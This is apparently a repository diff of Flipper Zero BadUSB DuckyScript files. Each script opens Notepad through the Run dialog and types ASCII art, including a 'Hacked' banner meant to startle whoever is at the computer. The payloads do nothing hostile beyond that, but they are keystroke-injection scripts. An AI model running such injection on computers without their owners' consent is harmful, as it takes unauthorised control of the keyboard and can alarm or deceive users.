STRLCPY/UNC0V3R3D_FlipperZero-BadUSB

■ ■ ■ ■ ■ ■

BadUsb-Collection/ASCII/Hacked.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Opens Notepad and types out the ASCII art
3	+	REM Version: 1.0
4	+	REM Category: ASCII
5	+	DELAY 1000
6	+	GUI r
7	+	DELAY 500
8	+	STRING notepad
9	+	ENTER
10	+	DELAY 1000
11	+	GUI UPARROW
12	+	DELAY 500
13	+	STRING #@@@@@@@/
14	+	ENTER
15	+	STRING @@@@@@@@@@@@@@@@@@@
16	+	ENTER
17	+	STRING @@@@@@@@@@@@@@@@@@@@@@@@@
18	+	ENTER
19	+	STRING .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
20	+	ENTER
21	+	STRING &@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%
22	+	ENTER
23	+	STRING &@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#
24	+	ENTER
25	+	STRING @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
26	+	ENTER
27	+	STRING (@@@@@@@@@@@@@@@@@@@@@@@@@. (@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@* .@@@@@@@@@@@@@@@@@@@@@@@@@&
28	+	ENTER
29	+	STRING (@@@@@@@@@@@@@@@@@@@@@@@@@, (@@@@@ #@@@, .@@@@@, ,@@@@@@@@@@@@@@@@@@@@@@@@@&
30	+	ENTER
31	+	STRING (@@@@@@ @@@@# @@@ &@@@@ %@@@@@&
32	+	ENTER
33	+	STRING (@@@@@@ @@@@. &@@@# *@@@@ %@@@@@&
34	+	ENTER
35	+	STRING (@@@@@@ (@@@@@* %@@@@@@@@@( /@@@@@, %@@@@@&
36	+	ENTER
37	+	STRING (@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@ %@@@@@&
38	+	ENTER
39	+	STRING (@@@@@@ #@@@@ (@@@@@@ @@& ,@@@@@@* .@@@@/ %@@@@@&
40	+	ENTER
41	+	STRING (@@@@@@ @@@@@@/ (@@@@@@@@@@@@@@@@@@@* %@@@@@@ %@@@@@&
42	+	ENTER
43	+	STRING (@@@@@@ (@@@@@@@@@@% ,@@ @@@@@@.@@@@@,(@@ &@@@@@@@@@@, %@@@@@&
44	+	ENTER
45	+	STRING (@@@@@@ .@@@@@@@@@@@@@@& #@@@@@ @@@@@ .@@@@@@@@@@@@@@@ %@@@@@&
46	+	ENTER
47	+	STRING (@@@@@@ @@@@@@@@@@, @@@@@@@@@@* %@@@@@&
48	+	ENTER
49	+	STRING (@@@@@@ .&@@@@@@@@@( #@@@@@@@@@% %@@@@@&
50	+	ENTER
51	+	STRING (@@@@@@ %@@@@@@@@@@@@@@@@@( %@@@@@&
52	+	ENTER
53	+	STRING (@@@@@@ .@@@@@@@@@@@ %@@@@@&
54	+	ENTER
55	+	STRING (@@@@@@ /@@@@@@@@@@@@@@@@@@@@@@@@@@@@@. %@@@@@&
56	+	ENTER
57	+	STRING (@@@@@@ @@@@@@@@@@@@ &@@@@@@@@@@@ %@@@@@&
58	+	ENTER
59	+	STRING (@@@@@@ &@@@@@@ . .@@@@@@% %@@@@@&
60	+	ENTER
61	+	STRING (@@@@@@ *@@@@& @@@@@. %@@@@@&
62	+	ENTER
63	+	STRING (@@@@@@ %@@@@@&
64	+	ENTER
65	+	STRING (@@@@@@ %@@@@@&
66	+	ENTER
67	+	STRING (@@@@@@ %@@@@@&
68	+	ENTER
69	+	STRING (@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&
70	+	ENTER
71	+	STRING (@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&
72	+	ENTER
73	+	ENTER
74	+	STRING @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#
75	+	ENTER
76	+	STRING /@@@@@, @@@@ .@@@@. @@@@ ,@@@@ .@@@@ ,@@@@ @@@@ ,@@@@. /@@@@&
77	+	ENTER
78	+	STRING @@@@@@ .,@@@@, .@@@@@ ,@@@@* @@@@@ .@@@@& %@@@@ @@@@@.. @@@@@@
79	+	ENTER
80	+	STRING &@@@@@% .@@@@% .@@@@% @@@@@ @@@@@ @@@@@ @@@@@* @@@@@ &@@@@@(
81	+	ENTER
82	+	STRING @@@@@@. ,@@@@@ %@@@@( @@@@@ (@@@@@ @@@@@, ,@@@@@ &@@@@% .@@@@@ @@@@@@
83	+	ENTER
84	+	STRING @@@@@@@ @@@@@ @@@@@ @@@@@ @@@@@# @@@@@% #@@@@@ *@@@@@ .@@@@@ .@@@@@@&
85	+	ENTER
86	+	STRING (@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*
87	+	ENTER
88	+	STRING @@@@@@@, .@@@@@, @@@@@# @@@@@@ %@@@@@ /@@@@@@@
89	+	ENTER
90	+	STRING %@@@@@@@ .@@@@@% .@@@@@( &@@@@@. @@@@@@ @@@@@@@/
91	+	ENTER
92	+	STRING @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
93	+	ENTER
94	+	STRING @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
95	+	ENTER
96	+	STRING @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
97	+	ENTER
98	+	ENTER
99	+	STRING ##### # # # ##### # # ####### ######
100	+	ENTER
101	+	STRING # # #### ##### ##### # # ##### # # ##### # # #### # # # # ## # # ###### ##### ###### ###### # # # # # # # # # # # # #
102	+	ENTER
103	+	STRING # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ## # # # # # # # # # # #
104	+	ENTER
105	+	STRING ##### # # # # # # # ##### # # # # # # # # ###### # # # # ##### ##### ##### ##### # # # ####### # # # ### ##### # #
106	+	ENTER
107	+	STRING # # # ##### ##### # ### # # # # # # # # # # # # ###### # # # # # # # # # # # # ####### # # # # # #
108	+	ENTER
109	+	STRING # # # # # # # # # ### # # # # # # # # # # # # # # # # # # # # # # ## # # # # # # # # # # #
110	+	ENTER
111	+	STRING ##### #### # # # # # # ##### #### # # #### #### # # # # ## ###### ##### ###### ###### # # # # # # ##### # # ####### ######
112	+	ENTER
113	+	DELAY 2000
114	+	CTRL HOME
115	+	DELAY 2000
116	+	CTRL END

■ ■ ■ ■ ■ ■

BadUsb-Collection/ASCII/MonaLisa.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Opens Notepad and types out the ASCII art
3	+	REM Version: 1.0
4	+	REM Category: ASCII
5	+	DELAY 2500
6	+	GUI R
7	+	DELAY 200
8	+	STRING notepad
9	+	ENTER
10	+	DELAY 300
11	+	ALT SPACE
12	+	DELAY 20
13	+	STRING x
14	+	ENTER
15	+	ENTER
16	+	ENTER
17	+	STRING XiiisiisrrsssiisssssiiiiiSiiiiiiiiiiiiSSSiiiiiiiissiiiiiiS55SSSSSSS5SSSiiiiisiiiiiiSSS
18	+	ENTER
19	+	STRING 2rrr;rrr;;rsrr;;;;;rrrrsrsrrrrrr;rrrrrrrrrr;;;;rrrrrrrrrrrrrrssrrr;rrrrrsrrrr;rrr;r;;r
20	+	ENTER
21	+	STRING 2sssrsisssssssrrriiiisi5iiSSSissssssiSiiiiisiiissssssrrsrrsiiiisssrsissiiisrsssssssiii
22	+	ENTER
23	+	STRING 5rrrrrrrrrrsrrssssrrsiiiiisisssssrrssssrsisrsssssssrrrrrr;rrrrrrsrrrrsrsrr;;rrrrrrrsii
24	+	ENTER
25	+	STRING 2;;rr;;;r;;;;;;;;rrrrrrssrrsrrsr;rrsrrr;;;;;;;rsrrssrrrr;;;;rrrrr;r;rrrr;;;;;rrrrrrsrs
26	+	ENTER
27	+	STRING 5rrrrrrrrr;;:;;;;;;;r;;rrrrrrrr;rrrrr;;;;;;::,::;;rrrrr;:;;;rrrr;;rrr;rrr;rrrrrrrrrrss
28	+	ENTER
29	+	STRING i;rr;rr;;;;;;;;;;;;:;;;;;;rr;;;rr;;;;;::,:;:::,,,:;;;;;;;;;;rrrrrrrrr;;rr;;rr;;rrrrrrr
30	+	ENTER
31	+	STRING s;r;::::;;:;;r;;;;;;;;;:;r;rrrr;;::,,;SGH#@@##HG2i;::;;;;;;;rrrrr;rrrr;rr;;r;:;;rrrrrr
32	+	ENTER
33	+	STRING i;;;;::;r;;;:;;;;;;;:::;;;;;;r;;:,;5#@@#@@@@@@@@@@@Mi:,;:;;rrr;rr;;;;;;r;;;;;:;;;rrrrr
34	+	ENTER
35	+	STRING i;;r;r;;;;:::;;:;::::;;;;;::;;:::s@@@@Ah@@@@@@@@@@@@@@r.:::;;;r;;;:;:::;;;;;;;;;;;;rrr
36	+	ENTER
37	+	STRING S;;::::::,:::::::::::::;;::::::.2@@#h2rih&H@@@@@@@@@@@@3..,::;;;;;;:;:;:::;::;;;r;;rr;
38	+	ENTER
39	+	STRING Sr;:.,,:,,:::;::::,,::;;;:::,,.i@Hr. .,;2HB#@@@@@@@@A.,:,:::;;::::::,:;:;;;;;;rrr;
40	+	ENTER
41	+	STRING i;;;:::,:,,,,:::::,:::::::,,,,S@&. :sXA##@@@@@@@A .,,::,,::::::::::::;;;;;rr;
42	+	ENTER
43	+	STRING r,:,,;:,,....,,,,,,,,:.,::,..r@@; ,r2GH#@#@@@@@@s ,:::,,:,,,:::,,,,::::;;;;;
44	+	ENTER
45	+	STRING r,:..,:;.... . .,,::,,:;:..rh@#;, ..,....,;;ri2hA##@#@@@@@:r;;:r;;:;:::::::,,:,:;;;::
46	+	ENTER
47	+	STRING 2rr;;;S5:,...,:. ..,:,,:,,.;A@@X:,....... .,::::;iA###@@@@@92Si52r:r;;;::,,:::::::;r;:
48	+	ENTER
49	+	STRING 9iXAGs5X2r;;rsis:,. .... .S#@@S..,, . ,;;:,,::r2B@@@@@@@@AXH332iiir5s,,,,:::,,;;iSsr
50	+	ENTER
51	+	STRING BAABA2S2552925hXh95s.... .;&A#@Hi2GAi,,s@@Bh&HM#BAM@@@@@#@@MABhXS5X5s9is::,::. ,;;ss5S
52	+	ENTER
53	+	STRING #MG3hS22S2h&XhAAA2iH; .:.:rBBH@#@A@@@;,@@9;#@@@#SS&###@@@@@@hAHBGX92A#35;.,,:,:;;rriSr
54	+	ENTER
55	+	STRING #GX5iiXSi3X2i&Hhh5X&;:2M&;;H##@;,,rXr..AX,.;sr, .rG@@#@@@#@@GHHA&3A&AAG9;.,,::;rrrsX5r
56	+	ENTER
57	+	STRING Mh332X252999GAG9HHA##A#G@HXh#@@: . .sr ,r2M@@@@@@@@@HA&A9X&&HBBB3;:;:;r;:;riii
58	+	ENTER
59	+	STRING AA#AGHAGhHG2GAh&B#M###MA@#HABM@3 ., .is,. .:S3A@@@@@#@@@@A25SsiSiS55XX5rrrrrrrissi5
60	+	ENTER
61	+	STRING BM@#&ABM&Ah25X3GAHAAHMB#@@@#HM@#:..;r :29;.,:rShAM@@##@@@@@@#MMHGXX222SiisiiSXGh#MX2A&
62	+	ENTER
63	+	STRING #M##B9&H&GAAAGX2&9&GAHAM#@@###@@3r;.:X@@@;.;s29&AM##@@@@@@@@@@@@@@######MHB#B#HA#@@@@M
64	+	ENTER
65	+	STRING #####hG&&AH&HBhhAAAA&HHB#B#@@M@@AsSs,rHBhhG5siX3GB#@@@@@@#@@#MMMBBBB#####@@#H&GAA####B
66	+	ENTER
67	+	STRING #B#MA9hAAH&hhAABHHHBBHMMBHB#MA@@@r;;;;s9BAS;rs2hA##@@##@@@@@#BHAAHHHBMMBHH&X2XhAB####M
68	+	ENTER
69	+	STRING #M#BGHAHAAAHHBMBHBHHAAA&GGHHM#@@@@3: .;riiisS3AAHM#@##@@@@@@#AGHBHHHAHBHHHAHM##HH&&B#M
70	+	ENTER
71	+	STRING ##M###BH&&H#MBHHHAG&hGhGG9&A##M#@@@@; :s2hH#MBM#@###@@@@@@#BhAH&939AHHAAAHHH&hAAAM@M
72	+	ENTER
73	+	STRING ##MMMM@#&&AHHM#MMMAMHA&9X2A#BB#M#@@@@AS3AB@@###@@#@@#####@@@##HAAHGAABA&A&&&HBAABAAM#M
74	+	ENTER
75	+	STRING ###HB#M#B&&A&HHA&AXGX22isi9###@#@@@@@@@@@@@@@@@#MMMM####@@@@@@#B##BHHBMMMMM####MHAAAAM
76	+	ENTER
77	+	STRING ####@@H#@A&Ahh3222S5issi552H@@####@@@@@iS&M@#MA&hX3A#@#@@@#M@@HHHHA&GAHMMBM@#MMMBM@@BB
78	+	ENTER
79	+	STRING #M##B@##AAHX225522i5X5S2559h##M##@#@@@@i.;s2XXX2isS3B##@@@##@@MA&3iSX25XS2322iss2&BBAB
80	+	ENTER
81	+	STRING #BA&93X52X559GHAM#H3h9&3&&BM@#@#@#@@@@@h;::;rsrrr;riG#M##@BB@@@@@@###G2XGhi;;iiXh2A#@#
82	+	ENTER
83	+	STRING #H9X9X9223XS9ABMGG@@@#@@@@@@@@@@@@@@H2;;;::;;;::;;:;5B#BABBH@@@@@@@@@@@@@@G;r2hhXS&@@#
84	+	ENTER
85	+	STRING ##BG3H#AA9X&M#&GA&@@@@@@M@@@@###@#X;:. ..,,,...,:,:sGMMhGHM@@@@@#BAh5issisriAH&AhM@@#
86	+	ENTER
87	+	STRING #BB#M@@AhhAA&h52X#@@G@@#B@@@##@##; ... .,,:;2#HA2&H@@##@@@MAAX:.,;52h92GA&AGB#
88	+	ENTER
89	+	STRING #MABAHMX2&3GX2SGHM#MhB@BAM@####A5. .... .,,;;i&3BGA#@@#@##@@@@#XiSsiisi525rSGH#
90	+	ENTER
91	+	STRING #M&HX2BHrrrSSS3hHAAA3&AAB@@@#&33; .... ..,,:rXB&BGH@@@#&3AH#@@#MHhXissGiriS2XXM
92	+	ENTER
93	+	STRING #MB#AH@@G3r:;risXAA92&#@@@@@&rrs, .... .,:::r93GHAM#HGXS5XhA#@@@@MAGXsrrr;:,,;G
94	+	ENTER
95	+	STRING #AAA&BMHB@@#3ssiiXG9H@@@##@#s,,. ... .. ...,,:r39HHG2s;::;;s2XH@@@@@@@@@##@HH9G&9
96	+	ENTER
97	+	STRING #A&925GAAB##@A3A3r;&@@@##@@Hr .... .:;sS5X5r;;;i3AB##@@@@@@@@@@@@@@@B2s;5
98	+	ENTER
99	+	STRING #AAHHHH&32&&33X5Sr2@@@@##@#HHr .,. .:ri25i2A#@@@@@@@@@@@@@@@@@#@@@@@@AS9
100	+	ENTER
101	+	STRING #H&AG22iri2SrrsiG@@@@@#B@MBAAMAAS;;;. :iX9AM#@@@@@@@@@@@@@@@@@@@@@@AHB#@@@@#
102	+	ENTER
103	+	STRING @M&h52r2GHXX&HB#@@@#@#M@MGh9HM@@#@@#AXirr;:,,,rXH@MH@@@@@@@@####@@@@@@@@@@@@@#G&9H@#B#
104	+	ENTER
105	+	STRING @#AXX92S2X5iSS2@@###@@##AhGAH@#B@#HM#@@@@@@@####@@M#@@@@@#A9&#B#@@@@@@@@@@@@@@#@M#@@AM
106	+	ENTER
107	+	STRING @@@BHAGX25222i2@@@##@@@@AA#&#@B@#GG&BBHB##@@#MH#@@@@@@@#MMh9@B#@######@@@@@@@@@M#@@@##
108	+	ENTER
109	+	STRING @@@@#MMBHHMMBAM@@@@@@#@#A###@H#@M&&hGAHM###BM#@@@@@@###BB#B@MHA25hHAHB#@@@@@@@@AXGG#@@
110	+	ENTER
111	+	STRING @#@#GAA&HBBAB##@@@@@@@@#M@#@#H#@MH#HBBM@#HH##@@@@@@@#@##@@@MBH2XG&H&BM#@@@@@@@@@BBA@@@
112	+	ENTER
113	+	STRING ##@2iisii5is5A#@@@@@@@@@#@@@##@@#@@@@@@#H#BM@@@@@@@@@@#@@@#AB&XG9hHM@@@@@@##@@@@@@#@@@
114	+	ENTER
115	+	STRING @#XsrsrrrrrrS#@#@@@#@@@@@@@@M#@@@@#@@@#HHM#@@@@@@@@@@@@@@#AHBh9AA#@@@@@@@@@#M@@@#hAh#@
116	+	ENTER
117	+	STRING #GSX222Xis5S#@@@@@@@@@@@#@@@##@@@@@@@@MMM@@@#@@@@@@@@@@@#BAH#AA#@@@@@@@@@@@###@@@AGG3M
118	+	ENTER
119	+	STRING #@@@#MMMMB#@@@@@#MM#@@@@@@@@##@@@@@@####@@###@@@@@@@@@@@#MB@@@@@@@#@@@@@@@@@#@@@@@@@@#
120	+	ENTER
121	+	STRING ####MHAB#@@@@@@#MMBB##@@@@@@@#@@@@@##@#####@@@@@@@@@@@@@##@@@@@@@##@@@@@@@@@@@@@@@@@@@
122	+	ENTER
123	+	STRING #MHHH&H@@@@##@@MBHHHB##@#@@@@#@#@@@#@####@@@##@@@@@@@@@@##@@@@@@##@@@@@@@@@@@@@@#####@
124	+	ENTER
125	+	STRING ###BB@@@@@###MMBH&&AM####@@@####@@@@#B#@@@@@@@#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@###M#@
126	+	ENTER
127	+	STRING #M#M@@@@###BAM#@###M##M##@@@#@@@@@@MB#@@@@@@@@@@@@@@@@@@@@@@@@####@#@@@@@@@@@@@####M#@
128	+	ENTER
129	+	STRING ###@@##M@@@@@@@@@@@@@@##@@@@@@@@@###@@@@@@@@@@@@@@@@@@@@@@@@@@@@###B##@@@@@@@@###@@#B@
130	+	ENTER
131	+	STRING @@@@@##@@#@H&&ABAHHB@@@#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#@@###@@@@@@@@###@@@@#@
132	+	ENTER
133	+	STRING @@@@#@#@MH&Ai&#G&A3&@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@##@@@@@@@@@@@@@@@@@@@@@@
134	+	ENTER
135	+	STRING @#@@##@@BHHGGXrXA23GXS#@Mh529H@@@@@@@@@@@@@@@@@@@@@@@@@@@#@@@@@@@##@@@@@@@@@@@@@@@@@@@
136	+	ENTER
137	+	STRING @@@@##@@B#Xi2SH&SA3Xihi. ,;SA@@@@@@@@@@@@@@@@@@@@@@@@@@@@@####@@@@@@@@@@@@@#@@@@@
138	+	ENTER
139	+	STRING @@@@##@@##X5M#32#BAH@5: ..,;3@@@@@@@@@@@@@@@@@@@@@@@@@@@#@@@@@@@@@@@@@@@@@@@@
140	+	ENTER
141	+	STRING @#@@@@@@@#H#@SH@#MA#B3r,:,::,...... ;XA@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
142	+	ENTER
143	+	STRING @####@#@@@@@#A@MMHA#A@hiS5Sir::,,,,,.. .rA@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
144	+	ENTER
145	+	STRING @#######@@##@@@@@@#@#@@MM#H95sr;;:;;,.:: .2H###&9AH##ASs2GG&&H@@@@@@@@@@@@@@@@@@@@@@
146	+	ENTER
147	+	STRING @#@@@@###@@@@@@@@#@@@@@@@@#hSSisrrsir:rH@X. .riiir:;SSSh92i2A&AAA#@@@@@@@@@@@@@@@@@@@@
148	+	ENTER
149	+	STRING @@@@@@@@@@@@@@@@@@@@@MXir,;G&X2555ii32;,2@@#Sr5X29AA9AG9BMA22B#MBM#@@@@@@@@@@@@@@@@@@@
150	+	ENTER
151	+	STRING @@@@@@@@@@@@@@@#@@@A;:ri:.:rG#HhXXi;rA#i.,X@@#&22h&##hHG3B@@#HM#BBB@@@@@@@@@@@@@@@@@@@
152	+	ENTER
153	+	STRING @@@@@@@@@@@@#@@##@@iiA2;rr,:r3##GhAh;.r#@i;rG@@@H#MM#M@#GX#@###@@###@@@@@@@@@@@@@@@@@@
154	+	ENTER
155	+	STRING @@@@@###@########@#iGSr3&r;:rsX##&X#@3:,A@#irSB@@##@#M@@@##@@##@@@@@@@@@@@@@@@@@@@@@@@
156	+	ENTER
157	+	STRING @@@##@@#@@#######@#X9SAB5i;rXh&B@@@H#@#&hA@@MirA@#@@#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
158	+	ENTER
159	+	STRING @@@@@@@@@@@@@@@##@@#BAA2srX#@@@@@@@@@@@@@#M#@@#H@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
160	+	ENTER
161	+	STRING @@@@##@@@@@@@##@@@@@@#HSiA@@@@#M##B##@#M#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
162	+	ENTER
163	+	STRING @#@@@#####@@####@@@@@@@9H@@@###@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
164	+	ENTER
165	+	STRING @#@#@##@@@@@@####@@@@@@MH@@@##@@@#####@@@@@@#@#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
166	+	ENTER
167	+	STRING @@@@#@@@###@@##@#@@@#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#@@@@@@@@@@@@@@@@@@@@@@@@@@
168	+	ENTER
169	+	STRING @@@@@@@@##@@##@@#####@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@##@@@
170	+	ENTER
171	+	STRING @@@@@@@###@@@@@@@@#@@@@@@@@@@@###@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
172	+	ENTER
173	+	STRING @@@@@@@@@@@@@@###@@@@@@@@@@@@@@###@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
174	+	ENTER
175	+	STRING @@@@@@#@@@#@#########@@@@@@@########@#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
176	+	ENTER
177	+	ENTER

■ ■ ■ ■ ■ ■

BadUsb-Collection/ASCII/PepeThonkASCII.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Opens Notepad and types out the ASCII art
3	+	REM Version: 1.0
4	+	REM Category: ASCII
5	+	DELAY 1000
6	+	GUI r
7	+	DELAY 500
8	+	STRING notepad
9	+	ENTER
10	+	DELAY 1000
11	+	GUI UPARROW
12	+	DELAY 500
13	+	STRING ::--=====--::. ....
14	+	ENTER
15	+	STRING .-*=::.. .:--=#= :*======++:
16	+	ENTER
17	+	STRING :#- -#+. :. :=+.
18	+	ENTER
19	+	STRING .**. :#%=. .#+
20	+	ENTER
21	+	STRING #: %+ -%:
22	+	ENTER
23	+	STRING #- .:-==++++==--:-@ .%=
24	+	ENTER
25	+	STRING - :+++=-::.....:::-===++: .:-=======-: *+
26	+	ENTER
27	+	STRING .=%+. .=%##=-::. ....-=+*+%-
28	+	ENTER
29	+	STRING +- =%- .=#*:
30	+	ENTER
31	+	STRING +* .-*+:
32	+	ENTER
33	+	STRING =%. *+
34	+	ENTER
35	+	STRING .-=++====+++++++++++++=.-@: .::---:*%.
36	+	ENTER
37	+	STRING .=+=:::--==+++++=---=+-..:+#% :++****+++++++++:
38	+	ENTER
39	+	STRING +#- -+*++=-::. .:-+#: -#. =%- :++=---=-==++#%#.
40	+	ENTER
41	+	STRING .#- +#=. .+#+-.:#= + .#: -#++++#*- #%-
42	+	ENTER
43	+	STRING #+=%= :-==++=+**********+++##++*: @- -.-#@%+++===: .*#+=
44	+	ENTER
45	+	STRING -:-+#@+: %@:@@@@@@@@# :++ @@%%@@@@@@#-**+--%-
46	+	ENTER
47	+	STRING :+=%@@@#@@@- :@@ +#. =%=@@*+@@@==%@- .-+%+
48	+	ENTER
49	+	STRING ==. -@@@=#@@==#@@ #+.% #+ +@@%=@@%-:#@= :*%=
50	+	ENTER
51	+	STRING -#. :=#%@@@@@@= :=+@* %+=*@@@@@@@@@@%::=#+.#.
52	+	ENTER
53	+	STRING :*-. .-=+#*****=:. #- .:-=++++***+=-. :%-
54	+	ENTER
55	+	STRING :=++++++++++========+++: .==-:....: +***%%.
56	+	ENTER
57	+	STRING ....:%. -%=--: --=*#:-%-
58	+	ENTER
59	+	STRING =**+ =%: .= :-:. #:
60	+	ENTER
61	+	STRING .:::. .-+*+- :+. -@=
62	+	ENTER
63	+	STRING -**=--. .:=+- .. ==%
64	+	ENTER
65	+	STRING =.##+**+-. .+=: #. +
66	+	ENTER
67	+	STRING -@ =-..:=+++++==-:. -#: =#.
68	+	ENTER
69	+	STRING =%= :#+=:. :--+***+=--:. -#+ -%-
70	+	ENTER
71	+	STRING -#+- .:=++-. .:--=++###++++=----==+++**= =#
72	+	ENTER
73	+	STRING .-+++- .-=+++++++++++==-:. ...::::::.... -*+-#.
74	+	ENTER
75	+	STRING -+-. ..-=+***++++++++#*= #
76	+	ENTER
77	+	STRING .-+#=: .... :#:
78	+	ENTER
79	+	STRING .-+++=-::.. .-+@
80	+	ENTER
81	+	STRING .:--=++******++======++##***+. @.
82	+	ENTER
83	+	STRING ..:::... -#
84	+	ENTER
85	+	STRING .=+++=++.:*
86	+	ENTER
87	+	STRING =#*: :#%.
88	+	ENTER
89	+	STRING -#= *#-.
90	+	ENTER
91	+	STRING :-=-..-+%#. .. :=++:
92	+	ENTER
93	+	STRING .#=..-#@- -# .+#=%%*#: -= =#+.
94	+	ENTER
95	+	STRING =+ -# ** =#:.# =%+#=. :#+
96	+	ENTER
97	+	STRING +. -+++%++- :++.-%%: -*.
98	+	ENTER
99	+	STRING -#+ = :#-*=. .#
100	+	ENTER
101	+	STRING +#. =##+.#. :- =%.
102	+	ENTER
103	+	STRING -* ++:%= -#=. -%:
104	+	ENTER
105	+	STRING :# .+@#. =# =%- .#-
106	+	ENTER
107	+	STRING =# :+-::* -#= :*: #.
108	+	ENTER
109	+	STRING .#*#: :--%= :%= =#. .%
110	+	ENTER
111	+	STRING :: .- .-. -: .- -.
112	+
113	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/ASCII/PepeWowASCII.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Opens Notepad and types out the ASCII art
3	+	REM Version: 1.0
4	+	REM Category: ASCII
5	+	DELAY 1000
6	+	GUI r
7	+	DELAY 500
8	+	STRING notepad
9	+	ENTER
10	+	DELAY 1000
11	+	GUI UPARROW
12	+	DELAY 500
13	+	ENTER
14	+	ENTER
15	+	ENTER
16	+	STRING .:--------::. ..::::::.
17	+	ENTER
18	+	STRING .=+*+++++++++++=-: .:==++*++++++*=.
19	+	ENTER
20	+	STRING .=++++++++++++++***#%=##+++++++++++++**###+++++++=-
21	+	ENTER
22	+	STRING -++++++++########**********####+++++++++##++++########+==-:
23	+	ENTER
24	+	STRING -*+++++++####+++++++++############%%###++++++++####+++*****++##+:
25	+	ENTER
26	+	STRING :**+++++##++++++++####**#########++*#%+###+#+==--:::--=++##*+.
27	+	ENTER
28	+	STRING +#*+++++#++++++++##+#+=:. .-=+#+@#++#+: .=*#%
29	+	ENTER
30	+	STRING +***+++++++++++++##+#- . -+%++%= :=##*=. -=
31	+	ENTER
32	+	STRING +***++++++++++++#+++#+. .+#@@@@@#=.-#%: .#@@@@@@@@#. -:
33	+	ENTER
34	+	STRING -#**++++++++++++#. @@@@@@@@@@@= + .@@++@@##@@@% -+
35	+	ENTER
36	+	STRING %****+++++++++#+=:. @@=#@%+#@@@- =+ -@@+@- .@@@: .*
37	+	ENTER
38	+	STRING =#***++++++++++%- @@@=#@ #@@+ % %@@%%=-@@% .*
39	+	ENTER
40	+	STRING #****++++++++++#+=- #@@@@%@+::=@@@- @: .@@@@@@@@* .+:
41	+	ENTER
42	+	STRING %****+++++++++++++++#+. .#@@#=@@@@@@@+ +##- .=+*+=. -+.
43	+	ENTER
44	+	STRING :#****++++++++++++++++++#- -#@@@@@@%+. .#+++#*+-. .-+%-
45	+	ENTER
46	+	STRING =#****+++++++++++++++#++#+: .::. :@++++++++##+++++++#*+#:
47	+	ENTER
48	+	STRING +*****+++++++++++++++++##+++#=:. .:=###++++++++####***********+-.
49	+	ENTER
50	+	STRING +*****+++++++++++++++++++###*++##*+++++##*+##+++++++++++++***######:
51	+	ENTER
52	+	STRING *****+++++++++++++++++++++++#######********#####+++++++++++++++++++++++++***+=
53	+	ENTER
54	+	STRING *****++++++++++++++++++++++++++++++++*******++++++++++++++++++++++++++++++++++#
55	+	ENTER
56	+	STRING ****+++++++++++++++++++++++++++++++++++++++++++++++++++######################+#.
57	+	ENTER
58	+	STRING ****+++++++++++++++++++++++++++++++++++++++++##########***********************#%%.
59	+	ENTER
60	+	STRING #****+++++++++++++++++++++++++++++++++++#######***********################****#
61	+	ENTER
